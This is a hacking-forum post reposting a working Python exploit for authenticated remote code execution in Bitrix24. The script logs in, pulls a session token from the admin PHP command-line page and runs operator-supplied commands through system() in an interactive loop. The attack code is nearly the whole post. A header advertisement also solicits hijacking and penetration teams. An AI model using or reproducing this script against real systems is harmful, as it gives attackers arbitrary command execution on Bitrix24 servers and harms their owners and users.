跳转到帖子
诚邀seo站长,短信,劫持,渗透,代理,推广团队,博主,主播,各种资源流量大佬合作共赢【站外广告】

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

Bitrix24 - Remote Code Execution (RCE) (Authenticated)

CHT丨情报收集
CHT丨情报收集
黑帽漏洞数据库

精选回复

发布于 
# Exploit Title: Bitrix24 - Remote Code Execution (RCE) (Authenticated)
# Date: 4/22/2022
# Exploit Author: picaro_o
# Vendor Homepage: https://www.bitrix24.com/apps/desktop.php
# Tested on: Linux os

#/usr/bin/env python
#Created by heinjame


import requests
import re
from bs4 import BeautifulSoup
import argparse,sys

user_agent = {'User-agent': 'HeinJame'}

parser = argparse.ArgumentParser()
parser.add_argument("host", help="Betrix URL")
parser.add_argument("uname", help="Bitrix Username")
parser.add_argument("pass", help="Bitrix Password")
pargs = parser.parse_args()
url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]

inputcmd = input(">>")
s = requests.Session()
def login():
	
	postdata = {'AUTH_FORM':'Y','TYPE':'AUTH','backurl':'%2Fstream%2F','USER_LOGIN':username,'USER_PASSWORD':password}
	r = s.post(url+"/stream/?login=yes", headers = user_agent , data = postdata)
def getsessionid():
	sessionid = s.get(url+"bitrix/admin/php_command_line?lang=en",
headers = user_agent)
	session = re.search(r"'bitrix_sessid':.*", sessionid.text)
	extract = session.group(0).split(":")
	realdata = extract[1].strip(" ")
	realdata = realdata.replace("'","")
	realdata = realdata.replace(",","")
	return realdata
	# print(r.text)
def cmdline(cmd,sessionid):
	cmdline = {'query':"system('"+cmd+"');",'result_as_text':'n','ajax':'y'}
	usercmd = s.post(url+"bitrix/admin/php_command_line.php?lang=en&sessid="+sessionid,headers
= user_agent, data = cmdline)
	soup = BeautifulSoup(usercmd.content,'html.parser')
	cmd = soup.find('p').getText()
	print(cmd.rstrip())
login()
sessionid = getsessionid()
while inputcmd != "exit":
		cmdline(inputcmd,sessionid)
		inputcmd = input(">>")

创建帐户或登录后发表意见

转到主题列表

最近浏览 0

  • 没有会员查看此页面。